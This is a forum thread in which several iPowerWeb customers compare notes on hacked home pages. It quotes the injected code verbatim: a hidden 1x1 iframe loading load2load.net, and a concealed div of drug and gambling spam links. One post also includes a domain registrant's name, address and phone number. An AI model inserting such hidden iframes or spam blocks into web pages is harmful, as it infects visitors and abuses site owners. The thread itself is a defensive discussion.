New Trojan? Any had a problem with Load2load.net before?

[Funboy]

Has anyone heard of load2load.net?

I've never seen anything like this before -

I have my own personal website and yesterday I checked it out online at work and it froze my entire computer. So I went home and tried it on my computer there - it locked up also and gave me some error (didn't write it down at the time). Tried the website on a third computer and same lock up occured.

I looked at the source code on the offending homepage - it's completely the same as the last version (1 month ago), except for that the new broken page had the follow code inserted into the very beginning before the <'head> tag....



<'iframe src='http://www'.load2load.net/out.php?s_id=1' width=1 height=1><'/iframe>

<'html>
<'head>



How did something edit my website's source code? Is this some type of virus or trojan?

 

[RebateMonger]

I'm not an expert at such things, but it looks like somebody added code to create a 1x1 pixel frame on your web site that presumably attempts to load nasty stuff on whoever views your web site. The 1x1 pixel frame is a tiny web page hidden on your web page, that can attempt to do bad things to the viewers computer or browser.

The domain, load2load.net, is registered to somebody in the U.S., but its nameservers are in Rumania. Not a really good sign. The domain name is two weeks old.

Domain information for load2load.net

How did this happen?

Well, most likely, either you didn't set proper security permissions on your web site site or the company that hosts your site didn't do its job. Also, there are TONS Of both Linux and Windows web servers out there that aren't fully patched. Or maybe you just used an easilly-broken password.

Or, less likely, somebody used an unpatched exploit to gain access to your web site.

 

[Funboy]

Thanks for the reply. I'm alerting my hosting company to let them know and see if they have any insight.

As far as security permissions - what should I be looking for that a "hacker" could take advantage of? Any specifics that I could include on my email to the web hosting company? (ipowerweb.com)

Thanks again

 

[mechBgon]

It's an instance of the as-yet-unpatched Internet Explorer vulnerability described here: McAfee's info, hit the Characteristics tab for the good info

BTW you should let your IT person know what happened so they can check your system carefully.

 

[BadThad]

I'm not an expert at such things, but it looks like somebody added code to create a 1x1 pixel frame on your web site that presumably attempts to load nasty stuff on whoever views your web site. The 1x1 pixel frame is a tiny web page hidden on your web page, that can attempt to do bad things to the viewers computer or browser.

That's exactly what that is.

 

[BadThad]

Registrant:

Brian Artz *****@mail.com
944 Sunnyside Rd

York, PA 17404
US
780-462-1152 Fax:

Administrative Contact:
Brian Artz *****@mail.com
944 Sunnyside Rd

York, PA 17404
US
780-462-1152

I'd call this guy and quiz him, lol.

 

[Funboy]

Thanks for the help everyone.

My webhosting company just emailed me back -

"Regarding the source code added to your pages, they would have gained access to your site most likely by generating you password using a password auto-generator. This is very easy to accomplish, particularly if you are using a non-secure password. If your password does not look something like 7As6DaTr then it is not a secure password. We have not received any other reports of websites being hacked, so someone hacking the sergver itself is unlikely.

As far as preventing this from happening again, there is nothing we can do to guarantee it won't happen again. We keep our server software up-to-date with all of the newest security updates, but most website hacks are through exploits with account passwords and website code. We cannot do anything to prevent those intrusions."

They basically said it was my problem, which at this point I'm still not sure of. I don't know if this occurred because of something on my end or theirs.

My main concern is making sure it doesn't happen again.

 

[mechBgon]

Give your account a strong password.

1) make it long, like 12+ characters.

2) use numerals, upper-case and lower-case letters, and symbols.

3) use one or more ALT characters (hold down the ALT key, then type 0176 on the keyboard, and you get a ° symbol, for example).

So for example, a strong password might be 98.6°F=tehBodayTemperature. Let's see 'em crack that by auto-generation :evil:

 

[Cipherfaction]

Well, can;t you just fix it and change your password

 

[BadThad]

Originally posted by: mechBgon
Give your account a strong password.

1) make it long, like 12+ characters.

2) use numerals, upper-case and lower-case letters, and symbols.

3) use one or more ALT characters (hold down the ALT key, then type 0176 on the keyboard, and you get a ° symbol, for example).

So for example, a strong password might be 98.6°F=tehBodayTemperature. Let's see 'em crack that by auto-generation :evil:

HAHAHAHA....Indeed. :thumbsup:

 

[mechBgon]

Hehe... and BTW Funboy, also scan your computer with a couple of antivirus scanners in case there's a keystroke logger on there that you don't know about. The strongest password in the world won't help, if they can see everything you type.

 

[ynot]

I hate to be the bearer of bad news, but I bet its not your password (though its always a good policy to make it strong).
If I had to take a stab in a dimly lit room, I'd guess that your host is iPower.

I've had 10 (yes TEN) of my clients who host with them have this same hack/infection. Each time iPower was called they gave that song and dance about the 'password must be compromised'. Some of these clients have VERY strong passwords. Some of these clients haven't even accessed their hosting accounts in a year or more(so it can't be recent keylogging). Some of them I don't know the passwords for (if you're wondering if I am the common link, I don't have access to all their accounts).
Their one commonality is the host. And the host doesn't seem to care that the same problem is being reported over and over again (not even taking details about the hack when support is called) so your chances of it happening again with them (if that's your host) are pretty high.
FYI, the offending domain (load2load) has changed once since the first couple of infections I saw (same implementation), so I expect it will change again (when this one gets shut down for violating registration and hosting agreements) And if you haven't already, send an abuse record to the registrar of record-- at least it will slow the culprit and the spread down.

 

[bumpski]

Hi

Thanks Ynot for posting your experience. One of my IPowerWeb sites was "hacked" in the same way a couple of days ago. I do have other accounts that have gone untouched. IPowerWeb did not inform me of other occurances which is disappointing. The lack of information from IPowerWeb made me do extra work that was perhaps unnecessary. Now I'll probably implement an automatic content verification system to detect future occurances. I monitor this particular site fairly infrequently and was luck I caught the problem. I should have been tipped off when tech support seemed so familiar with the one line hack and the fact it was typically only done to the home page.

With reverse DNS it is now very easy to see all the other IPowerWeb clients so it is tempting to start a cooperative IPowerWeb monitor.

 

[ynot]

Yeah, keep watching your other iPower sites-- mine were not infected all at once. They all happened over a period of the last 2 months. I haven't figured out a pattern of infection - I should check IP sequence maybe the next time.
I think monitoring is a good idea and a co-op would be cool. One of the reasons I posted at all was in case other IPower folks went out searching for info on this hack. I want them to know they are not alone. All I did for my clients was restore the index.htm from backup. The first couple I did extensive search and analysis and didn't find any other hacks or compromises on their accounts, so its just a simple one step or edit the offending line out of index.htm using a NON-Wysiwyg editor, On iPower you have to turn this feature off if you're editing through their control panel, which you access through Preferences and you can go back and turn it back on after editing the line out.
Let me know if you see your other sites affected...

 

[fadedlazer]

I have recently found the same load2load iframe on my index, hosted by ipower. I am on a shared server as well. I have not found any other files changed, and it looks like it only affects your index page. Here is a post of the mysterious html that was inserted on the page in hopes that it helps anyone else out...

Top of code:
<iframe src='http://www.load2load.net/out.php?s_id=6' width=1 height=1></iframe>

Bottom/End of page code:
<div style='overflow:auto; display:none; height: 1px;'><a href='http://minzdrav.idv.tw/adipex/'>buy adipex cheap adipex online</a><a href='http://minzdrav.idv.tw/alprazolam/'>buy alprazolam cheap alprazolam online</a><a href='http://minzdrav.idv.tw/ambien/'>buy ambien cheap ambien online</a><a href='http://minzdrav.idv.tw/ativan/'>buy ativan cheap ativan online</a><a href='http://minzdrav.idv.tw/bontril/'>buy bontril cheap bontril online</a><a href='http://minzdrav.idv.tw/boxing-betting/'>boxing betting odds</a><a href='http://minzdrav.idv.tw/butalbital/'>buy butalbital cheap butalbital online</a><a href='http://minzdrav.idv.tw/carisoma/'>buy carisoma cheap carisoma online</a><a href='http://minzdrav.idv.tw/carisoprodol/'>buy carisoprodol cheap carisoprodol online</a><a href='http://minzdrav.idv.tw/cialis/'>buy cialis cheap cialis online</a><a href='http://minzdrav.idv.tw/clonazepam/'>buy clonazepam cheap clonazepam online</a><a href='http://minzdrav.idv.tw/diazepam/'>buy diazepam cheap diazepam online</a><a href='http://minzdrav.idv.tw/didrex/'>buy didrex cheap didrex online</a><a href='http://minzdrav.idv.tw/fastin/'>buy fastin cheap fastin online</a><a href='http://minzdrav.idv.tw/fioricet/'>buy fioricet cheap fioricet online</a><a href='http://minzdrav.idv.tw/hydrocodone/'>buy hydrocodone cheap hydrocodone online</a><a href='http://minzdrav.idv.tw/ionamin/'>buy ionamin cheap ionamin online</a><a href='http://minzdrav.idv.tw/klonopin/'>buy klonopin cheap klonopin online</a><a href='http://minzdrav.idv.tw/lorazepam/'>buy lorazepam cheap lorazepam online</a><a href='http://minzdrav.idv.tw/lorcet/'>buy lorcet cheap lorcet online</a><a href='http://minzdrav.idv.tw/lortab/'>buy lortab cheap lortab online</a><a href='http://minzdrav.idv.tw/online-pharmacy/'>cheap online pharmacy</a><a href='http://minzdrav.idv.tw/phentermine/'>buy phentermine cheap phentermine online</a><a href='http://minzdrav.idv.tw/poker-room/'>poker room online</a><a href='http://minzdrav.idv.tw/rivotril/'>buy rivotril cheap rivotril online</a><a href='http://minzdrav.idv.tw/soma/'>buy soma cheap soma online</a><a href='http://minzdrav.idv.tw/stilnox/'>buy stilnox cheap stilnox online</a><a href='http://minzdrav.idv.tw/tenuate/'>buy tenuate cheap tenuate online</a><a href='http://minzdrav.idv.tw/texas-holdem/'>play texas holdem online</a><a href='http://minzdrav.idv.tw/tramadol/'>buy tramadol cheap tramadol online</a><a href='http://minzdrav.idv.tw/ultram/'>buy ultram cheap ultram online</a><a href='http://minzdrav.idv.tw/valium/'>buy valium cheap valium online</a><a href='http://minzdrav.idv.tw/viagra/'>buy viagra cheap viagra online</a><a href='http://minzdrav.idv.tw/vicodin/'>buy vicodin cheap vicodin online</a><a href='http://minzdrav.idv.tw/xanax/'>buy xanax cheap xanax online</a><a href='http://minzdrav.idv.tw/zolpidem/'>buy zolpidem cheap zolpidem online</a></div>

 

[StoneUSA7]

Same just happened to one of the sites I manage on IpowerWeb. Those guys must have gotten hacked directly. The front page had been modified 2 days ago (May 1st) and was iframe linking to load2load.net.

Really frustrating to hear that iPowerWeb isn't doing much about it. I guess I'm just replying to raise my hand and say it happened to me as well and I'll checking all the other sites I have with them as I write.

*EDIT*

Make that 3 of the sites I manage on iPowerWeb. Great.

 

[Lynxfx]

Raising my hand as well. Two of my ipower websites were hit. Did a search on load2load and found this thread. So far no answer from the live tech support. Guess they are getting hit with users. Sounds like the issue is on their end but just incase I went through every site and changed the password to an even stronger randomly generated password.

Losing faith in ipowerweb. I go between them and startlogic and it looks like I might stay more on the startlogic side.

 

[thefigure]

I use Ipowerweb and until now have had no problems.

I have just discovered one of my sites was highjacked. I removed the load2load line in the index page and now it is ok.

When I went to this site, my anti-virus programs came up immediately and locked out download.trojan.

Another site was locked out by Ipowerweb for unknown reasons for a few days (it showed the vdeck screen). It came back up when I sent an email over their techsupport page. (haven't got an answer on that one yet).